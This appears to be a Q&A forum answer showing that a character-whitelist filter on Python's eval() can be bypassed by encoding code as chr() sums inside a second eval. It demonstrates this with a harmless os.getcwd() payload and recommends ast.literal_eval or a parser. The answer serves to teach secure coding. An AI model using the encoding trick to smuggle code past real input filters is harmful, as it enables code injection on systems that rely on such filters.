There are many questions on SO about using Python's eval() on insecure strings (e.g. Security of Python's eval() on untrusted strings?, Python: make eval safe).
Here is a working "exploit" that satisfies your restrictions: the string contains only lowercase ASCII characters, digits, and the signs +-*/(). It relies on a second eval layer.
def mask_code(python_code):
    # Encode every character as chr(<ordinal>), join the pieces with "+",
    # and wrap the whole thing in a second eval() layer.
    s = "+".join(["chr(" + str(ord(i)) + ")" for i in python_code])
    return "eval(" + s + ")"

bad_code = '''__import__("os").getcwd()'''
masked = mask_code(bad_code)
print(masked)
print(eval(masked))
output:
eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(103)+chr(101)+chr(116)+chr(99)+chr(119)+chr(100)+chr(40)+chr(41))
/home/user
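To see why character restrictions of this kind don't help, here is a minimal sketch of a naive character filter (the exact whitelist is my assumption, not something from the original question), reusing bad_code and masked from above. It rejects the raw payload but happily accepts the masked one:

import string

# Hypothetical whitelist: lowercase letters, digits, and the allowed signs.
ALLOWED = set(string.ascii_lowercase + string.digits + "+-*/() ")

def passes_filter(expr):
    # Naive character-level check: every character must be in the whitelist.
    return all(ch in ALLOWED for ch in expr)

print(passes_filter(bad_code))   # False: underscores, quotes and the dot are rejected
print(passes_filter(masked))     # True: only lowercase letters, digits, "+", "(" and ")" remain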
This is a very trivial "exploit", and I'm sure there are countless others, even with further character restrictions. It bears repeating that one should always use a parser or ast.literal_eval(). Only by parsing the tokens can one be sure the string is safe to evaluate. Anything else is betting against the house.
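As a minimal sketch of the safe alternative (again reusing masked from above): ast.literal_eval() parses the string and accepts only Python literals, so the payload is rejected instead of executed:

import ast

# Only literals (strings, numbers, tuples, lists, dicts, sets, booleans, None)
# are accepted; any function call such as eval(...) or chr(...) raises an error.
print(ast.literal_eval("[1, 2, 'safe']"))   # [1, 2, 'safe']

try:
    ast.literal_eval(masked)                # the chr()/eval() payload built above
except ValueError as exc:
    print("rejected:", exc)

Note that literal_eval only handles literals, not arbitrary arithmetic, so if you need to evaluate expressions you still want a small dedicated parser (e.g. one built on the ast module) rather than eval with character restrictions.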